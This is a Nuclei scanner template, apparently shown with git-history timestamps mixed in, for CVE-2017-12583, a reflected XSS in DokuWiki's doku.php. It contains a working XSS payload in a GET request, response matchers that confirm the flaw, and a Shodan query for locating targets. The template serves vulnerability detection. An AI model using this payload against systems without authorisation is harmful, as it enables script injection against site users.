nuclei-templates/cves/2017/CVE-2017-12583.yaml

39 lines
967 B
YAML
Raw Normal View History

id: CVE-2017-12583
info:
name: Reflected XSS in doku.php
author: DhiyaneshDK
severity: medium
description: DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php.
reference:
- https://github.com/splitbrain/dokuwiki/issues/2061
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-12583
cwe-id: CWE-79
metadata:
shodan-query: http.title:"DokuWiki"
2022-04-14 08:33:28 +00:00
tags: cve,cve2017,xss,dokuwiki
requests:
- method: GET
path:
2022-04-14 08:44:00 +00:00
- '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>'
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-04-14 08:44:00 +00:00
- 'Unable to parse at parameter "<svg onload=alert(document.domain)>".</div>'
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200